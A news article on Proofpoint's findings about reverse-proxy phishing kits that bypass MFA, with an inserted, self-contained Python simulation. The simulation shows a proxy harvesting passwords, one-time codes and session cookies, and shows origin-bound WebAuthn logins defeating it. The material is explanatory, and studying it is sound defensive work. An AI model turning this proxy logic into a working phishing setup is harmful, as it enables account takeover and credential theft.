In the beginning the password was created. This has made a lot of people very angry and been widely regarded as a bad move. Then we had two-factor authentication – and now criminals have started bypassing it with transparent reverse proxies, according to Proofpoint.
Phishing kits – ready-made deployables that crooks use to steal victims’ login details – are increasingly capable of bypassing multi-factor authentication (MFA), the company warned today.
In a blog post Proofpoint stated that it sees “multiple MFA phishing kits ranging from simple open-source kits with human readable code and no-frills functionality to sophisticated kits using multiple layers and built-in modules that handle usernames, allow theft of passwords, MFA tokens, social security numbers and credit card numbers.”
Naming three specialised MFA-bypassing phishing kits (Modlishka, Muraena/NecroBrowser and Evilginx), Proofpoint said they are deployed on ready-made phishing domains: sites that masquerade as the genuine sites victims want to log into. These are usually bank websites, email or storage providers and so on – anything holding information that criminals can turn to profit.
The reverse proxy concept is simple: fool the user into visiting a phishing page, use a reverse proxy to fetch all the legitimate content the user expects, login pages included, and sniff the traffic as it passes through the proxy. This lets criminals intercept valid session cookies and skip the need to authenticate with a username, password and 2FA token altogether. The trick works against any second factor the victim types or approves – SMS and TOTP codes, push prompts – because the proxy simply relays them to the real site. It does not work against origin-bound credentials such as FIDO2/WebAuthn, where the browser signs the domain it is actually talking to and the genuine site rejects an assertion made for the lookalike.
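To make the flow concrete, here is an added in-process simulation of a transparent reverse-proxy phishing exchange. It is not code from the article or from any of the kits it names: the hostnames, the user, the password, the one-time code and the “real site” are all constructed stand-ins, and nothing touches the network. It shows both sides of the exchange (victim to proxy, proxy to genuine site, and back), the Host/Origin rewrite on the way in, the harvesting of the submitted credentials and of the session cookie issued after MFA succeeds, and the domain rewrite on the way out that keeps the browser on the phishing domain. It also goes one step beyond the article by contrasting a typed OTP with an origin-bound WebAuthn-style login, where the same proxy gets no usable session.

```python
# Toy simulation of a transparent reverse-proxy ("MITM") phishing flow.
# Added example, not code from the article or from Modlishka/Muraena/Evilginx.
# Everything is in-process: the "real site" is a constructed stand-in, the
# hostnames and credentials are made up, and no network traffic is sent.
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

REAL_HOST = "login.example.com"       # genuine site (assumed name)
PHISH_HOST = "login.example-com.net"  # attacker's lookalike domain (assumed name)
VALID_OTP = "123456"                  # the one-time code the victim will type (constructed)


@dataclass
class HttpMessage:
    """Minimal HTTP request or response: start line, headers, body."""
    start: str
    headers: dict = field(default_factory=dict)
    body: str = ""


def real_site(req: HttpMessage) -> HttpMessage:
    """Constructed stand-in for the genuine login server.

    Accepts password + TOTP code (phishable), or a WebAuthn-style assertion whose
    'origin' field stands for the origin the browser signed into clientDataJSON
    (phishing-resistant: the relying party checks it against its own origin).
    """
    form = {k: v[0] for k, v in parse_qs(req.body).items()}
    if req.start.startswith("POST /login/otp"):
        ok = (form.get("user") == "alice" and form.get("pw") == "hunter2"
              and form.get("otp") == VALID_OTP)
    elif req.start.startswith("POST /login/webauthn"):
        ok = form.get("user") == "alice" and form.get("origin") == f"https://{REAL_HOST}"
    else:
        return HttpMessage("HTTP/1.1 200 OK", {"Content-Type": "text/html"},
                           f'<form action="https://{REAL_HOST}/login/otp">')
    if not ok:
        return HttpMessage("HTTP/1.1 401 Unauthorized", {}, "login failed")
    return HttpMessage("HTTP/1.1 302 Found", {
        "Location": f"https://{REAL_HOST}/home",
        "Set-Cookie": f"session=s3ss10n; Domain={REAL_HOST}; Secure; HttpOnly",
    })


def proxy(req: HttpMessage, captured: list, upstream=real_site) -> HttpMessage:
    """The transparent reverse proxy: relay everything, harvest on the way through."""
    fwd = HttpMessage(req.start, dict(req.headers), req.body)
    # 1. Make the request look like it went straight from the victim to the real site.
    fwd.headers["Host"] = REAL_HOST
    for h in ("Origin", "Referer"):
        if h in fwd.headers:
            fwd.headers[h] = fwd.headers[h].replace(PHISH_HOST, REAL_HOST)
    # 2. Sniff submitted credentials (username, password, OTP) from form bodies.
    if fwd.start.startswith("POST"):
        captured.append({"kind": "form", **{k: v[0] for k, v in parse_qs(fwd.body).items()}})
    # 3. Forward to the genuine site and let it perform the real authentication.
    resp = upstream(fwd)
    # 4. Grab any session cookie the real site issues once MFA has succeeded.
    if "Set-Cookie" in resp.headers:
        captured.append({"kind": "cookie", "value": resp.headers["Set-Cookie"]})
    # 5. Rewrite the response so the browser keeps talking to the phishing domain.
    headers = {k: v.replace(REAL_HOST, PHISH_HOST) for k, v in resp.headers.items()}
    return HttpMessage(resp.start, headers, resp.body.replace(REAL_HOST, PHISH_HOST))


def victim_logs_in_with_otp() -> Tuple[HttpMessage, List[dict]]:
    """Password + TOTP: the proxy walks away with a valid session cookie."""
    captured: List[dict] = []
    proxy(HttpMessage("GET / HTTP/1.1", {"Host": PHISH_HOST}), captured)
    resp = proxy(HttpMessage("POST /login/otp HTTP/1.1",
                             {"Host": PHISH_HOST, "Origin": f"https://{PHISH_HOST}"},
                             f"user=alice&pw=hunter2&otp={VALID_OTP}"), captured)
    return resp, captured


def victim_logs_in_with_webauthn() -> Tuple[HttpMessage, List[dict]]:
    """Origin-bound credential: the browser signed the phishing origin, so the real site refuses.
    The proxy can rewrite headers, but not the signed origin inside the assertion."""
    captured: List[dict] = []
    resp = proxy(HttpMessage("POST /login/webauthn HTTP/1.1",
                             {"Host": PHISH_HOST, "Origin": f"https://{PHISH_HOST}"},
                             f"user=alice&origin=https://{PHISH_HOST}"), captured)
    return resp, captured


def stolen_session_cookie(captured: List[dict]) -> Optional[str]:
    """Return the harvested session cookie (name=value), ready for replay, or None."""
    for item in captured:
        if item["kind"] == "cookie":
            return item["value"].split(";")[0]
    return None


if __name__ == "__main__":
    resp, cap = victim_logs_in_with_otp()
    print(resp.start, resp.headers.get("Location"), stolen_session_cookie(cap))
    resp, cap = victim_logs_in_with_webauthn()
    print(resp.start, stolen_session_cookie(cap))
```

The point to take from the two flows: the proxy never breaks TLS or guesses the code, it simply sits between the victim and the genuine site and keeps whatever the genuine site hands back. A replayable `session=` cookie is the prize, and the only thing that stops it here is a second factor that is cryptographically tied to the origin the browser really visited.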
Using an in-house machine learning tool called Foca, Proofpoint said it scanned more than 1,200 phishing sites that were using reverse proxies to fetch the content of the real websites, so that the fake site passed as the real deal.
“Of those 1200+ sites, only 43.7 percent of domains and 18.9 percent of IP addresses appeared on popular blocklists like VirusTotal,” the firm said.
Reverse proxy phishing kits are, Proofpoint said, an evolution of the age-old man-in-the-middle (MITM) concept. In common usage a reverse proxy sits in front of a server or group of servers and directs traffic to them, as we explained a few years ago when discussing the yet-to-happen death of IPv4. One use of a reverse proxy is as a load balancer. They are sometimes called “transparent” because the user never sees the proxy: they believe they are talking to the server behind it, and all the proxied traffic comes from the same public IP address.
With apologies to the late, great Douglas Adams for the top paragraph.